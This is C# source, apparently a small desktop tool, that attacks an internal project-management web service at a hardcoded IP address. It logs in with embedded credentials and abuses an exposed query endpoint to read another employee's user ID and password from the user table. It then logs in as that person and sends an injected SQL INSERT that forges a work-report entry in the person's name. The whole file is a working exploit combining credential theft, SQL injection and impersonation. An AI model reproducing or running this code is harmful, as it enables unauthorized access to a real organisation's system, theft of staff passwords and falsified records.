private void button_Click(object sender, RoutedEventArgs e)
{
String username = nameTextBox.Text.ToString();
HttpClient httpClientBase = login("yL3P/tHg", "21218CCA77804D2BA1922C33E0151105");
try {
String base64Name = getBase64Name(username, httpClientBase);
if (base64Name.Equals("s8K8yraw"))
{
MessageBox.Show("放下那只鼠标让本宝宝自己来~");
return;
}
emp emp = getPasswdAndId(username, httpClientBase);
emp.EmpName = username;
emp.Bs64Name = base64Name;
HttpClient httpClient = login(emp.Bs64Name, emp.Passwd);
job job = getJobDate(httpClient);
String jobSql = getJobSql(emp, job);
String response = injectJobData(httpClient, jobSql);
MessageBox.Show("强制" + job.Project + "项目组" + username + "报工成功!");
}
catch (Exception exception) {
MessageBox.Show("报工失败:名字有误OR已冻结OR LEADER!");
}
}
//获取ID密码
public emp getPasswdAndId(String username, HttpClient httpClient)
{
emp emp = new emp();
String sqlurl = "http://123.232.10.234:8083/servlet/com.sdjxd.pms.platform.serviceBreak.Invoke?p=6962531A-0F5E-43E9-84ED-185AE9A93CFE";
List <KeyValuePair <String, String> > paramList = new List <KeyValuePair <String, String> >();
paramList.Add(new KeyValuePair <string, string>("_c", "com.sdjxd.pms.platform.form.service.cell.ComboBox"));
paramList.Add(new KeyValuePair <string, string>("_m", "refresh"));
paramList.Add(new KeyValuePair <string, string>("_p0", "\"defaultds\""));
paramList.Add(new KeyValuePair <string, string>("_p1", "\"[\"2\",[\"JXD7_XT_USER\",\"USERID\",\"PASSWD\",\" WHERE 1=1 AND USERNAME = '******'\",\" ORDER BY USERID\"],\"0\",\"0\",\"0\",\"1\"]\""));
paramList.Add(new KeyValuePair <string, string>("_p2", "\"6962531A-0F5E-43E9-84ED-185AE9A93CFE\""));
paramList.Add(new KeyValuePair <string, string>("_p3", "77"));
HttpResponseMessage response = httpClient.PostAsync(new Uri(sqlurl), new FormUrlEncodedContent(paramList)).Result;
String result = response.Content.ReadAsStringAsync().Result;
Regex regex = new Regex("JSClass.extend\\(\\[\"");
String[] str = regex.Split(result);
if (str.Length < 3)
{
return(null);
}
Regex regexId = new Regex("\"],\"");
String[] objectId = regexId.Split(str[1]);
String[] password = regexId.Split(str[2]);
emp.ObjectId = objectId[0];
emp.Passwd = password[0];
return(emp);
}
//拼接注入SQL
public String getJobSql(emp emp, job job)
{
StringBuilder jobSQL = new StringBuilder();
jobSQL.Append(" IF NOT EXISTS (SELECT * FROM dbo.BGXT_BGLRB WHERE CREATEUSERID='" + emp.ObjectId + "' AND BGRQ = '" + job.Data + "') ");
jobSQL.Append(" BEGIN ");
jobSQL.Append(" INSERT INTO dbo.BGXT_BGLRB ( ");
jobSQL.Append(" BEIZHU, ");
jobSQL.Append(" BGRQ, ");
jobSQL.Append(" BGSTATUS, ");
jobSQL.Append(" CQQK, ");
jobSQL.Append(" CREATEDATE, ");
jobSQL.Append(" CREATEDEPT, ");
jobSQL.Append(" CREATEDEPTID, ");
jobSQL.Append(" CREATEORG, ");
jobSQL.Append(" CREATEORGID, ");
jobSQL.Append(" CREATEUSER, ");
jobSQL.Append(" CREATEUSERID, ");
jobSQL.Append(" DATASTATUSID, ");
jobSQL.Append(" DNSY, ");
jobSQL.Append(" EDITUSER, ");
jobSQL.Append(" EDITUSERID, ");
jobSQL.Append(" GZDID, ");
jobSQL.Append(" GZDMC, ");
jobSQL.Append(" GZL, ");
jobSQL.Append(" JBSJ, ");
jobSQL.Append(" LASTOPENTIME, ");
jobSQL.Append(" LOCATION, ");
jobSQL.Append(" OPENER, ");
jobSQL.Append(" OPENERID, ");
jobSQL.Append(" PATTERNID, ");
jobSQL.Append(" SBLX, ");
jobSQL.Append(" SHEETID, ");
jobSQL.Append(" SHEETNAME, ");
jobSQL.Append(" SHOWORDER, ");
jobSQL.Append(" SHZT, ");
jobSQL.Append(" XMZID, ");
jobSQL.Append(" XMZMC, ");
jobSQL.Append(" YXMZID, ");
jobSQL.Append(" YXMZMC, ");
jobSQL.Append(" YZSFWID, ");
jobSQL.Append(" YZSFWMC, ");
jobSQL.Append(" ZSFWID, ");
jobSQL.Append(" ZSFWMC ");
jobSQL.Append(" ) SELECT ");
jobSQL.Append(" BEIZHU, ");
jobSQL.Append(" '"+ job.Data + "', ");
jobSQL.Append(" '2', ");
jobSQL.Append(" CQQK, ");
jobSQL.Append(" '"+ job.Datajq + "', ");
jobSQL.Append(" CREATEDEPT, ");
jobSQL.Append(" CREATEDEPTID, ");
jobSQL.Append(" CREATEORG, ");
jobSQL.Append(" CREATEORGID, ");
jobSQL.Append(" CREATEUSER, ");
jobSQL.Append(" CREATEUSERID, ");
jobSQL.Append(" DATASTATUSID, ");
jobSQL.Append(" DNSY, ");
jobSQL.Append(" EDITUSER, ");
jobSQL.Append(" EDITUSERID, ");
jobSQL.Append(" GZDID, ");
jobSQL.Append(" GZDMC, ");
jobSQL.Append(" GZL, ");
jobSQL.Append(" JBSJ, ");
jobSQL.Append(" '"+ job.Datajq + "', ");
jobSQL.Append(" LOCATION, ");
jobSQL.Append(" OPENER, ");
jobSQL.Append(" OPENERID, ");
jobSQL.Append(" PATTERNID, ");
jobSQL.Append(" SBLX, ");
jobSQL.Append(" '"+ job.SheetId + "', ");
jobSQL.Append(" SHEETNAME, ");
jobSQL.Append(" SHOWORDER, ");
jobSQL.Append(" SHZT, ");
jobSQL.Append(" XMZID, ");
jobSQL.Append(" XMZMC, ");
jobSQL.Append(" YXMZID, ");
jobSQL.Append(" YXMZMC, ");
jobSQL.Append(" YZSFWID, ");
jobSQL.Append(" YZSFWMC, ");
jobSQL.Append(" ZSFWID, ");
jobSQL.Append(" ZSFWMC ");
jobSQL.Append(" FROM ");
jobSQL.Append(" dbo.BGXT_BGLRB ");
jobSQL.Append(" WHERE ");
jobSQL.Append(" CREATEUSERID = '"+ emp.ObjectId + "' ");
jobSQL.Append(" AND BGRQ = '"+ job.Bgrq + "' ");
jobSQL.Append(" END ");
return(jobSQL.ToString());
}
